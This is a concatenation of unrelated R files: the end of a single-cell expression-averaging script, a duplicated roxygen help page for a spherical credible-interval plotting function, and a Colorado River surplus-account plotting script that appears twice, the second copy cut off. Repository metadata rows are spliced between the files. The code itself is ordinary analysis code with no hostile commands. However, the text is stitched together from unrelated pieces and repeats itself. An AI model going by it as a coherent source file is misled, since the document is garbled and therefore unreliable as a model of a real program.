rownames(metadata_tmp) <- metadata_tmp$integrated_barcode
srat@meta.data <- metadata_tmp
## change identification for the cells to be aliquot id
Idents(srat) <- "tumor_exp_subcluster.name"
## run average expression
aliquot.averages <- AverageExpression(srat)
# NOTE(review): same print()-vs-cat() inconsistency as above
print("Finish running AverageExpression!\n")
cat("###########################################\n")
## write output (tab-separated, genes as row names)
write.table(aliquot.averages, file = path_output, quote = F, sep = "\t", row.names = T)
cat("Finished saving the output\n")
cat("###########################################\n")
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/plot.CImapSphere.R
\name{plot.CImapSphere}
\alias{plot.CImapSphere}
\title{Plotting of simultaneous credible intervals on a sphere.}
\usage{
\method{plot}{CImapSphere}(x, lon, lat, color = c("firebrick1",
"gainsboro", "dodgerblue3"), turnOut = FALSE, title, ...)
}
\arguments{
\item{x}{List containing the simultaneous credible intervals of all
differences of smooths.}
\item{lon}{Vector containing the longitudes of the data points.}
\item{lat}{Vector containing the latitudes of the data points.}
\item{color}{Vector of length 3 containing the colors to be used in the
credibility maps. The first color represents the credibly negative pixels,
the second color the pixels that are not credibly different from zero
and the third color the credibly positive pixels.}
\item{turnOut}{Logical. Should the output images be turned 90 degrees
counter-clockwise?}
\item{title}{Vector containing one string per plot. The required
number of titles is equal to \code{length(mrbOut$ciout)}. If no \code{title}
is passed, defaults are used.}
\item{...}{Further graphical parameters can be passed.}
}
\value{
Plots of simultaneous credible intervals for all differences of
smooths are created.
}
\description{
Maps with simultaneous credible intervals for all differences of smooths
at neighboring scales \eqn{z_{i}} are plotted. Continental lines are added.
}
\details{
The default colors of the maps have the following meaning:
\itemize{
\item \strong{Blue}: Credibly positive pixels.
\item \strong{Red}: Credibly negative pixels.
\item \strong{Grey}: Pixels that are not credibly different from zero.
}
\code{x} corresponds to the \code{ciout}-part of the
output of \code{\link{mrbsizeRsphere}}.
}
\examples{
# Artificial spherical sample data
set.seed(987)
sampleData <- matrix(stats::rnorm(2000), nrow = 200)
sampleData[50:65, ] <- sampleData[50:65, ] + 5
lon <- seq(-180, 180, length.out = 20)
lat <- seq(-90, 90, length.out = 10)
# mrbsizeRsphere analysis
mrbOut <- mrbsizeRsphere(posteriorFile = sampleData, mm = 20, nn = 10,
lambdaSmoother = c(0.1, 1), prob = 0.95)
# Posterior mean of the differences of smooths
plot(x = mrbOut$smMean, lon = lon, lat = lat,
color = fields::tim.colors())
# Credibility analysis using simultaneous credible intervals
plot(x = mrbOut$ciout, lon = lon, lat = lat)
}
| /man/plot.CImapSphere.Rd | no_license | romanflury/mrbsizeR | R | false | true | 2,455 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/plot.CImapSphere.R
\name{plot.CImapSphere}
\alias{plot.CImapSphere}
\title{Plotting of simultaneous credible intervals on a sphere.}
\usage{
\method{plot}{CImapSphere}(x, lon, lat, color = c("firebrick1",
"gainsboro", "dodgerblue3"), turnOut = FALSE, title, ...)
}
\arguments{
\item{x}{List containing the simultaneous credible intervals of all
differences of smooths.}
\item{lon}{Vector containing the longitudes of the data points.}
\item{lat}{Vector containing the latitudes of the data points.}
\item{color}{Vector of length 3 containing the colors to be used in the
credibility maps. The first color represents the credibly negative pixels,
the second color the pixels that are not credibly different from zero
and the third color the credibly positive pixels.}
\item{turnOut}{Logical. Should the output images be turned 90 degrees
counter-clockwise?}
\item{title}{Vector containing one string per plot. The required
number of titles is equal to \code{length(mrbOut$ciout)}. If no \code{title}
is passed, defaults are used.}
\item{...}{Further graphical parameters can be passed.}
}
\value{
Plots of simultaneous credible intervals for all differences of
smooths are created.
}
\description{
Maps with simultaneous credible intervals for all differences of smooths
at neighboring scales \eqn{z_{i}} are plotted. Continental lines are added.
}
\details{
The default colors of the maps have the following meaning:
\itemize{
\item \strong{Blue}: Credibly positive pixels.
\item \strong{Red}: Credibly negative pixels.
\item \strong{Grey}: Pixels that are not credibly different from zero.
}
\code{x} corresponds to the \code{ciout}-part of the
output of \code{\link{mrbsizeRsphere}}.
}
\examples{
# Artificial spherical sample data
set.seed(987)
sampleData <- matrix(stats::rnorm(2000), nrow = 200)
sampleData[50:65, ] <- sampleData[50:65, ] + 5
lon <- seq(-180, 180, length.out = 20)
lat <- seq(-90, 90, length.out = 10)
# mrbsizeRsphere analysis
mrbOut <- mrbsizeRsphere(posteriorFile = sampleData, mm = 20, nn = 10,
lambdaSmoother = c(0.1, 1), prob = 0.95)
# Posterior mean of the differences of smooths
plot(x = mrbOut$smMean, lon = lon, lat = lat,
color = fields::tim.colors())
# Credibility analysis using simultaneous credible intervals
plot(x = mrbOut$ciout, lon = lon, lat = lat)
}
|
# ICS-Plots.r
#
# Make stacked bar graph of state Intentionally Created Surplus holdings by year
#
# Data is USBR Water Accounting Reports: https://www.usbr.gov/lc/region/g4000/wtracct.html in source Excel file
# Please report bugs/feedback to:
#
# Updated June 23, 2020 to include annual deposits and withdraws as year-to-year differnces
#
# Updated April 4, 2021 to look at ICS to DCP conversion
# Updated June 10, 2021 to include 2020 data.
#
# David E. Rosenberg
# June 6, 2021
#
# Utah State University
# david.rosenberg@usu.edu
rm(list = ls()) #Clear history
# Load required libraies
if (!require(tidyverse)) {
install.packages("tidyverse", repos="https://cran.cnr.berkeley.edu/", verbose = TRUE)
library(tidyverse)
}
if (!require(readxl)) {
install.packages("readxl", repos="http://cran.r-project.org")
library(readxl)
}
if (!require(RColorBrewer)) {
install.packages("RColorBrewer",repos="http://cran.r-project.org")
library(RColorBrewer) #
}
if (!require(dplyr)) {
install.packages("dplyr",repos="http://cran.r-project.org")
library(dplyr) #
}
if (!require(expss)) {
install.packages("expss",repos="http://cran.r-project.org")
library(expss) #
}
if (!require(reshape2)) {
install.packages("reshape2", repos="http://cran.r-project.org")
library(reshape2)
}
if (!require(pracma)) {
install.packages("pracma", repos="http://cran.r-project.org")
library(pracma)
}
if (!require(lubridate)) {
install.packages("lubridate", repos="http://cran.r-project.org")
library(lubridate)
}
if (!require(directlabels)) {
install.packages("directlabels", repo="http://cran.r-project.org")
library(directlabels)
}
if (!require(plyr)) {
install.packages("plyr", repo="http://cran.r-project.org")
library(plyr)
}
# Fix: the CRAN package is "ggplot2" -- there is no "ggplot" (or "ggPlot")
# package; this script uses ggplot2 functions (ggplot, geom_bar, ...) throughout.
if (!require(ggplot2)) {
  install.packages("ggplot2", repo="http://cran.r-project.org", dependencies = T)
  library(ggplot2)
}
if (!require(stringr)) {
install.packages("stringr", repo="http://cran.r-project.org")
library(stringr)
}
# Load Data
# Read in state balances each year
# (read_excel from readxl; the fixed cell ranges must match the workbook layout)
sExcelFile <- 'IntentionallyCreatedSurplus-Summary.xlsx'
dfICSBalance <- read_excel(sExcelFile, sheet = "Sheet1", range = "B6:G17")
dfICStoDCP <- read_excel(sExcelFile, sheet = "ICStoDCP", range = "A2:M14")
dfLimits <- read_excel(sExcelFile, sheet = "Sheet1", range = "A23:F26")
#Read in max balance
# NOTE(review): this reads the exact same range as dfLimits above; rows are
# used positionally below (Total[1] = max deposit, Total[2] = max balance,
# Total[3] = max withdraw) -- confirm the duplicate read is intentional
nMaxBalance <- read_excel(sExcelFile, sheet = "Sheet1", range = "A23:F26")
#create a data frame
#dfMaxBalance <- data.frame(Year=dfICSBalance$Year, MaxBal = nMaxBalance$Total[2])
#Read in max deposit per year
# One row per year, with the constant annual deposit/withdraw limits repeated
dfMaxAnnualAmounts <- data.frame(Year=dfICSBalance$Year, MaxDeposit = nMaxBalance$Total[1], MaxWithdraw = nMaxBalance$Total[3])
cColNames <- colnames(dfICSBalance)
#Melt the data so state columns become a variable
# (reshape2::melt; columns 1:4 are presumably the three states plus Mexico -- verify)
dfICSBalanceMelt <- melt(data = dfICSBalance,id.vars = "Year", measure.vars = cColNames[1:4])
#Calculate the Current ICS balance as a fraction of current Mead Storage
# Data from: https://www.usbr.gov/lc/region/g4000/hourly/levels.html
nCurrMeadStorage <- 9934*1000 # May 1, 2021
# NOTE(review): plyr is attached after dplyr above, so summarise() may dispatch
# to plyr::summarise; on this ungrouped data frame the result is the same.
nCurrICSTotal <- dfICSBalanceMelt %>% filter(Year == 2019) %>% summarise(Total = sum(value))
# #Lake Powell Unregulated inflow. Data from https://www.usbr.gov/uc/water/crsp/studies/images/PowellForecast.png
# dfLakePowellNatural <- data.frame (Year = seq(2011,2020,by=1), LakePowellFlow = c(16, 5, 5, 10.3, 10.1, 9.7, 12, 5, 13, 5.9))
#
# # Read in Paria flows each year
# sExcelFile <- 'Paria10yearFlow.xlsx'
# dfParia <- read_excel(sExcelFile, sheet = "Sheet1", range = "N36:P58")
#
# #Join the Lake Powell Natural and Paria data frames by year
# dfLeeFerryNatural <- left_join(dfLakePowellNatural,dfParia,by = c("Year" = "Water Year"))
#
# dfLeeFerryNatural$LeeFerryFlow <- dfLeeFerryNatural$LakePowellFlow + dfLeeFerryNatural$`Flow (acre-feet)`/1e6
# Report headline ratios to the console
# NOTE(review): "continential" in the string below is a typo in a runtime
# message ("continental") -- left unchanged here to preserve output bytes
print("ICS balance as fraction of Mead storage")
print(sprintf("%.1f%%",nCurrICSTotal$Total/nCurrMeadStorage*100))
print("Percent of Upper Colorado River Basin area of entire continential US area")
print(sprintf("%.1f%%",109800/3119884*100))
# print("Lake Powell Natural Flow 2011 to 2020 (maf per year)")
# print(sprintf("%.1f", mean(dfLeeFerryNatural$LakePowellFlow)))
#
# print("Paria flow 2011 to 2020 (maf per year)")
# print(sprintf("%.3f", mean(dfLeeFerryNatural$`Flow (acre-feet)`/1e6)))
#
# print("Lee Ferry Natural Flow 2011 to 2020 (maf per year)")
# print(sprintf("%.1f", mean(dfLeeFerryNatural$LeeFerryFlow)))
palBlues <- brewer.pal(9, "Blues")
#Plot #1. Stacked bar chart of account balance by state by year. Add individual state limits as secondary y axis
# Prepare state limits as a cumulative amount
cColNamesLimits <- colnames(dfLimits)
dfLimitsMelt <- melt(data=dfLimits, id.vars="New levels with DCP", measure.vars = cColNamesLimits[2:5])
# Keep only the per-state maximum balances (drop the Total column).
# Fix: use <- for assignment, consistent with the rest of the script.
dfMaxBalanceCum <- dfLimitsMelt %>% filter(`New levels with DCP` == "Max Balance (AF)", variable != 'Total')
#Reorder so Arizona is on top
dfMaxBalanceCum$Order <- c(3,2,1)
dfMaxBalanceCum <- dfMaxBalanceCum[order(dfMaxBalanceCum$Order),]
#Calculate the cumulative total (stacking positions for the secondary-axis labels)
dfMaxBalanceCum$CumVal <- cumsum(dfMaxBalanceCum$value)
#Replace the Arizona label (the topmost cumulative value doubles as the total)
dfMaxBalanceCum$StateAsChar <- as.character(dfMaxBalanceCum$variable)
dfMaxBalanceCum$StateAsChar[3] <- "Total/Arizona"
ggplot() +
geom_bar(data=dfICSBalanceMelt %>% filter(variable != "Mexico"), aes(fill=variable,y=value/1e6,x=Year),position="stack", stat="identity") +
geom_hline(yintercept = nMaxBalance$Total[2]/1e6, size = 2) +
#geom_line(data=dfMaxBalance, aes(color="Max Balance", y=MaxBal/1e6,x=Year), size=2) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNames[1:3]) +
scale_color_manual(name="Guide2", values=c("Black")) +
scale_x_continuous(breaks=seq(min(dfICSBalanceMelt$Year),max(dfICSBalanceMelt$Year),by=2),labels=seq(min(dfICSBalanceMelt$Year),max(dfICSBalanceMelt$Year),by=2)) +
#Secondary scale with total max balance
#scale_y_continuous(breaks=seq(0,3,by=1),labels=seq(0,3,by=1), sec.axis = sec_axis(~. +0, name = "", breaks = c(nMaxBalance$Total[2])/1e6, labels = c("Max Balance"))) +
#Secondary scale with individual state max balances
scale_y_continuous(breaks=seq(0,3,by=1),labels=seq(0,3,by=1), sec.axis = sec_axis(~. +0, name = "Maximum Balance", breaks = dfMaxBalanceCum$CumVal/1e6, labels = dfMaxBalanceCum$StateAsChar)) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color=FALSE) +
theme_bw() +
labs(x="", y="Intentionally Created Surplus\nAccount Balance\n(MAF)") +
theme(text = element_text(size=20), legend.title = element_blank(),
legend.text=element_text(size=18),
legend.position= c(0.1,0.80))
#Plot #2. Stacked bar chart of deposits to ICS accounts by state by year
#Calcualte deposits each year the differences by year
dfICSDeposit <- data.frame(-diff(as.matrix(dfICSBalance)))
#Put the correct year back in
dfICSDeposit$Year <- dfICSBalance$Year[1:nrow(dfICSDeposit)]
#Melt the data so state columns become a variable
dfICSDepositMelt <- melt(data = dfICSDeposit,id.vars = "Year", measure.vars = cColNames[1:3])
ggplot() +
geom_bar(data=dfICSDepositMelt, aes(fill=variable,y=value/1e6,x=Year),position="stack", stat="identity") +
geom_line(data=dfMaxAnnualAmounts, aes(y=MaxDeposit/1e6,x=Year), size=2) +
geom_line(data=dfMaxAnnualAmounts, aes(color="Max Withdrawal", y=-MaxWithdraw/1e6,x=Year), size=2) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNames[1:3]) +
scale_color_manual(name="Guide2", values=c("Black","Black")) +
scale_x_continuous(breaks=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2),labels=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2)) +
scale_y_continuous(sec.axis = sec_axis(~. +0, name = "", breaks = c(nMaxBalance$Total[1],-nMaxBalance$Total[3])/1e6, labels = c("Max Deposit","Max Withdraw"))) +
#scale_x_continuous(breaks = c(0,5,10,15,20,25),labels=c(0,5,10,15, 20,25), limits = c(0,as.numeric(dfMaxStor %>% filter(Reservoir %in% c("Mead")) %>% select(Volume))),
# sec.axis = sec_axis(~. +0, name = "Mead Level (feet)", breaks = dfMeadPoolsPlot$stor_maf, labels = dfMeadPoolsPlot$label)) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Deposit to Intentionally Created Surplus Account\n(MAF per year)") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
# Plot Years ICS balance can fund DCP target
# Ratio of ICS balance to DCP target (Years)
dfICStoDCP$ElevationText <- paste(dfICStoDCP$`Mead Elevation (ft)`, "feet")
cColNamesICStoDCP <- colnames(dfICStoDCP)
dfICStoDCPMelt <- melt(data = dfICStoDCP,id.vars = "ElevationText", measure.vars = cColNamesICStoDCP[5:7])
ggplot(data=dfICStoDCPMelt %>% filter((ElevationText == "1025 feet") | (ElevationText == "1045 feet") )) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNamesICStoDCP[5:7], labels = cColNames[1:3]) +
scale_x_discrete(labels = cColNames[1:3]) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Years 2019 ICS balance can fund\nDCP target") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
### Ratio of ICS max withdrawal to DCP target
dfICStoDCPMeltMaxWithdrawal <- melt(data = dfICStoDCP,id.vars = "ElevationText", measure.vars = cColNamesICStoDCP[8:10])
ggplot(data=dfICStoDCPMeltMaxWithdrawal %>% filter((ElevationText == "1025 feet") | (ElevationText == "1045 feet") )) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNamesICStoDCP[8:10], labels = cColNames[1:3]) +
scale_x_discrete(labels = cColNames[1:3]) +
scale_y_continuous(labels = scales::percent) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Ratio of ICS max withdrawal\nto DCP target") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
### Ratio of ICS max deposit to DCP target
dfICStoDCPMeltMaxDeposit <- melt(data = dfICStoDCP,id.vars = "ElevationText", measure.vars = cColNamesICStoDCP[11:13])
ggplot(data=dfICStoDCPMeltMaxDeposit %>% filter((ElevationText == "1025 feet") | (ElevationText == "1045 feet") )) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
#Add a horizontal line for 100%
geom_hline(yintercept = 1,linetype="dashed",color="red",size = 0.75) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNamesICStoDCP[11:13], labels = cColNames[1:3]) +
#scale_color_manual(name="Guide2", values=c("Black","Black")) +
#scale_fill_continuous(name="Guide1",values = c(palBlues[6],palBlues[9])) +
scale_x_discrete(labels = cColNames[1:3]) +
#scale_x_continuous(breaks=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2),labels=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2)) +
scale_y_continuous(labels = scales::percent) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Ratio of ICS max deposit\nto DCP target") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
### Ratio of largest ICS deposit on record to DCP target
# Get the maximum historical ICS contributions
dfICSMaxDeposit <- dfICSDeposit %>% summarize(maxAZ = max(Arizona), maxCA = max(California), maxNV = max(Nevada))
# Get the DCP contributions for 1045 and 1025 feet
dfDCPcontribute <- dfICStoDCP %>% filter(`Mead Elevation (ft)` == 1045 | `Mead Elevation (ft)` == 1025 )
#Join the two data frames
dfICStoDCPRatio <- dfDCPcontribute
dfICStoDCPRatio$ICSAZ <- dfICSMaxDeposit$maxAZ
dfICStoDCPRatio$ICSCA <- dfICSMaxDeposit$maxCA
dfICStoDCPRatio$ICSNV <- dfICSMaxDeposit$maxNV
dfICStoDCPRatio$AZratio <- dfICStoDCPRatio$ICSAZ / dfICStoDCPRatio$`DCP-AZ Reduction (ac-ft)`
dfICStoDCPRatio$CAratio <- dfICStoDCPRatio$ICSCA / dfICStoDCPRatio$`DCP-CA Reduction (ac-ft)`
dfICStoDCPRatio$NVratio <- dfICStoDCPRatio$ICSNV / dfICStoDCPRatio$`DCP-NV Reduction (ac-ft)`
dfICStoDCPRatio$ElevationText <- paste(dfICStoDCPRatio$`Mead Elevation (ft)`," feet")
cNamesRatio <- colnames(dfICStoDCPRatio)
dfICStoDCPRatioMelt <- melt(data = dfICStoDCPRatio,id.vars = "ElevationText", measure.vars = cNamesRatio[18:20])
ggplot(data=dfICStoDCPRatioMelt ) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
#Add a horizontal line for 100%
geom_hline(yintercept = 1,linetype="dashed",color="red",size = 0.75) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cNamesRatio[18:20], labels = cColNames[1:3]) +
#scale_color_manual(name="Guide2", values=c("Black","Black")) +
#scale_fill_continuous(name="Guide1",values = c(palBlues[6],palBlues[9])) +
scale_x_discrete(labels = cColNames[1:3]) +
#scale_x_continuous(breaks=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2),labels=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2)) +
scale_y_continuous(labels = scales::percent) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Conservation Capacity\n(ratio of largest ICS deposit to DCP contribution)") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
| /ICS/.Rproj.user/873C41F6/sources/per/t/F7BBD64C-contents | permissive | dzeke/ColoradoRiverFutures | R | false | false | 14,345 | # ICS-Plots.r
#
# Make stacked bar graph of state Intentionally Created Surplus holdings by year
#
# Data is USBR Water Accounting Reports: https://www.usbr.gov/lc/region/g4000/wtracct.html in source Excel file
# Please report bugs/feedback to:
#
# Updated June 23, 2020 to include annual deposits and withdraws as year-to-year differnces
#
# Updated April 4, 2021 to look at ICS to DCP conversion
# Updated June 10, 2021 to include 2020 data.
#
# David E. Rosenberg
# June 6, 2021
#
# Utah State University
# david.rosenberg@usu.edu
rm(list = ls()) #Clear history
# Load required libraies
if (!require(tidyverse)) {
install.packages("tidyverse", repos="https://cran.cnr.berkeley.edu/", verbose = TRUE)
library(tidyverse)
}
if (!require(readxl)) {
install.packages("readxl", repos="http://cran.r-project.org")
library(readxl)
}
if (!require(RColorBrewer)) {
install.packages("RColorBrewer",repos="http://cran.r-project.org")
library(RColorBrewer) #
}
if (!require(dplyr)) {
install.packages("dplyr",repos="http://cran.r-project.org")
library(dplyr) #
}
if (!require(expss)) {
install.packages("expss",repos="http://cran.r-project.org")
library(expss) #
}
if (!require(reshape2)) {
install.packages("reshape2", repos="http://cran.r-project.org")
library(reshape2)
}
if (!require(pracma)) {
install.packages("pracma", repos="http://cran.r-project.org")
library(pracma)
}
if (!require(lubridate)) {
install.packages("lubridate", repos="http://cran.r-project.org")
library(lubridate)
}
if (!require(directlabels)) {
install.packages("directlabels", repo="http://cran.r-project.org")
library(directlabels)
}
if (!require(plyr)) {
install.packages("plyr", repo="http://cran.r-project.org")
library(plyr)
}
# Fix: the CRAN package is "ggplot2" -- there is no "ggplot" (or "ggPlot")
# package; this script uses ggplot2 functions (ggplot, geom_bar, ...) throughout.
if (!require(ggplot2)) {
  install.packages("ggplot2", repo="http://cran.r-project.org", dependencies = T)
  library(ggplot2)
}
if (!require(stringr)) {
install.packages("stringr", repo="http://cran.r-project.org")
library(stringr)
}
# Load Data
# Read in state balances each year
sExcelFile <- 'IntentionallyCreatedSurplus-Summary.xlsx'
dfICSBalance <- read_excel(sExcelFile, sheet = "Sheet1", range = "B6:G17")
dfICStoDCP <- read_excel(sExcelFile, sheet = "ICStoDCP", range = "A2:M14")
dfLimits <- read_excel(sExcelFile, sheet = "Sheet1", range = "A23:F26")
#Read in max balance
nMaxBalance <- read_excel(sExcelFile, sheet = "Sheet1", range = "A23:F26")
#create a data frame
#dfMaxBalance <- data.frame(Year=dfICSBalance$Year, MaxBal = nMaxBalance$Total[2])
#Read in max deposit per year
dfMaxAnnualAmounts <- data.frame(Year=dfICSBalance$Year, MaxDeposit = nMaxBalance$Total[1], MaxWithdraw = nMaxBalance$Total[3])
cColNames <- colnames(dfICSBalance)
#Melt the data so state columns become a variable
dfICSBalanceMelt <- melt(data = dfICSBalance,id.vars = "Year", measure.vars = cColNames[1:4])
#Calculate the Current ICS balance as a fraction of current Mead Storage
# Data from: https://www.usbr.gov/lc/region/g4000/hourly/levels.html
nCurrMeadStorage <- 9934*1000 # May 1, 2021
nCurrICSTotal <- dfICSBalanceMelt %>% filter(Year == 2019) %>% summarise(Total = sum(value))
# #Lake Powell Unregulated inflow. Data from https://www.usbr.gov/uc/water/crsp/studies/images/PowellForecast.png
# dfLakePowellNatural <- data.frame (Year = seq(2011,2020,by=1), LakePowellFlow = c(16, 5, 5, 10.3, 10.1, 9.7, 12, 5, 13, 5.9))
#
# # Read in Paria flows each year
# sExcelFile <- 'Paria10yearFlow.xlsx'
# dfParia <- read_excel(sExcelFile, sheet = "Sheet1", range = "N36:P58")
#
# #Join the Lake Powell Natural and Paria data frames by year
# dfLeeFerryNatural <- left_join(dfLakePowellNatural,dfParia,by = c("Year" = "Water Year"))
#
# dfLeeFerryNatural$LeeFerryFlow <- dfLeeFerryNatural$LakePowellFlow + dfLeeFerryNatural$`Flow (acre-feet)`/1e6
print("ICS balance as fraction of Mead storage")
print(sprintf("%.1f%%",nCurrICSTotal$Total/nCurrMeadStorage*100))
print("Percent of Upper Colorado River Basin area of entire continential US area")
print(sprintf("%.1f%%",109800/3119884*100))
# print("Lake Powell Natural Flow 2011 to 2020 (maf per year)")
# print(sprintf("%.1f", mean(dfLeeFerryNatural$LakePowellFlow)))
#
# print("Paria flow 2011 to 2020 (maf per year)")
# print(sprintf("%.3f", mean(dfLeeFerryNatural$`Flow (acre-feet)`/1e6)))
#
# print("Lee Ferry Natural Flow 2011 to 2020 (maf per year)")
# print(sprintf("%.1f", mean(dfLeeFerryNatural$LeeFerryFlow)))
palBlues <- brewer.pal(9, "Blues")
#Plot #1. Stacked bar chart of account balance by state by year. Add individual state limits as secondary y axis
# Prepare state limits as a cumulative amount
cColNamesLimits <- colnames(dfLimits)
dfLimitsMelt <- melt(data=dfLimits, id.vars="New levels with DCP", measure.vars = cColNamesLimits[2:5])
dfMaxBalanceCum = dfLimitsMelt %>% filter(`New levels with DCP` == "Max Balance (AF)", variable != 'Total')
#Reorder so Arizona is on top
dfMaxBalanceCum$Order <- c(3,2,1)
dfMaxBalanceCum <- dfMaxBalanceCum[order(dfMaxBalanceCum$Order),]
#Calculate the cumulative total
dfMaxBalanceCum$CumVal <- cumsum(dfMaxBalanceCum$value)
#Replace the Arizona label
dfMaxBalanceCum$StateAsChar <- as.character(dfMaxBalanceCum$variable)
dfMaxBalanceCum$StateAsChar[3] <- "Total/Arizona"
ggplot() +
geom_bar(data=dfICSBalanceMelt %>% filter(variable != "Mexico"), aes(fill=variable,y=value/1e6,x=Year),position="stack", stat="identity") +
geom_hline(yintercept = nMaxBalance$Total[2]/1e6, size = 2) +
#geom_line(data=dfMaxBalance, aes(color="Max Balance", y=MaxBal/1e6,x=Year), size=2) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNames[1:3]) +
scale_color_manual(name="Guide2", values=c("Black")) +
scale_x_continuous(breaks=seq(min(dfICSBalanceMelt$Year),max(dfICSBalanceMelt$Year),by=2),labels=seq(min(dfICSBalanceMelt$Year),max(dfICSBalanceMelt$Year),by=2)) +
#Secondary scale with total max balance
#scale_y_continuous(breaks=seq(0,3,by=1),labels=seq(0,3,by=1), sec.axis = sec_axis(~. +0, name = "", breaks = c(nMaxBalance$Total[2])/1e6, labels = c("Max Balance"))) +
#Secondary scale with individual state max balances
scale_y_continuous(breaks=seq(0,3,by=1),labels=seq(0,3,by=1), sec.axis = sec_axis(~. +0, name = "Maximum Balance", breaks = dfMaxBalanceCum$CumVal/1e6, labels = dfMaxBalanceCum$StateAsChar)) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color=FALSE) +
theme_bw() +
labs(x="", y="Intentionally Created Surplus\nAccount Balance\n(MAF)") +
theme(text = element_text(size=20), legend.title = element_blank(),
legend.text=element_text(size=18),
legend.position= c(0.1,0.80))
#Plot #2. Stacked bar chart of deposits to ICS accounts by state by year
#Calcualte deposits each year the differences by year
dfICSDeposit <- data.frame(-diff(as.matrix(dfICSBalance)))
#Put the correct year back in
dfICSDeposit$Year <- dfICSBalance$Year[1:nrow(dfICSDeposit)]
#Melt the data so state columns become a variable
dfICSDepositMelt <- melt(data = dfICSDeposit,id.vars = "Year", measure.vars = cColNames[1:3])
ggplot() +
geom_bar(data=dfICSDepositMelt, aes(fill=variable,y=value/1e6,x=Year),position="stack", stat="identity") +
geom_line(data=dfMaxAnnualAmounts, aes(y=MaxDeposit/1e6,x=Year), size=2) +
geom_line(data=dfMaxAnnualAmounts, aes(color="Max Withdrawal", y=-MaxWithdraw/1e6,x=Year), size=2) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNames[1:3]) +
scale_color_manual(name="Guide2", values=c("Black","Black")) +
scale_x_continuous(breaks=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2),labels=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2)) +
scale_y_continuous(sec.axis = sec_axis(~. +0, name = "", breaks = c(nMaxBalance$Total[1],-nMaxBalance$Total[3])/1e6, labels = c("Max Deposit","Max Withdraw"))) +
#scale_x_continuous(breaks = c(0,5,10,15,20,25),labels=c(0,5,10,15, 20,25), limits = c(0,as.numeric(dfMaxStor %>% filter(Reservoir %in% c("Mead")) %>% select(Volume))),
# sec.axis = sec_axis(~. +0, name = "Mead Level (feet)", breaks = dfMeadPoolsPlot$stor_maf, labels = dfMeadPoolsPlot$label)) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Deposit to Intentionally Created Surplus Account\n(MAF per year)") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
# Plot Years ICS balance can fund DCP target
# Ratio of ICS balance to DCP target (Years)
dfICStoDCP$ElevationText <- paste(dfICStoDCP$`Mead Elevation (ft)`, "feet")
cColNamesICStoDCP <- colnames(dfICStoDCP)
dfICStoDCPMelt <- melt(data = dfICStoDCP,id.vars = "ElevationText", measure.vars = cColNamesICStoDCP[5:7])
ggplot(data=dfICStoDCPMelt %>% filter((ElevationText == "1025 feet") | (ElevationText == "1045 feet") )) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNamesICStoDCP[5:7], labels = cColNames[1:3]) +
scale_x_discrete(labels = cColNames[1:3]) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Years 2019 ICS balance can fund\nDCP target") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
### Ratio of ICS max withdrawal to DCP target
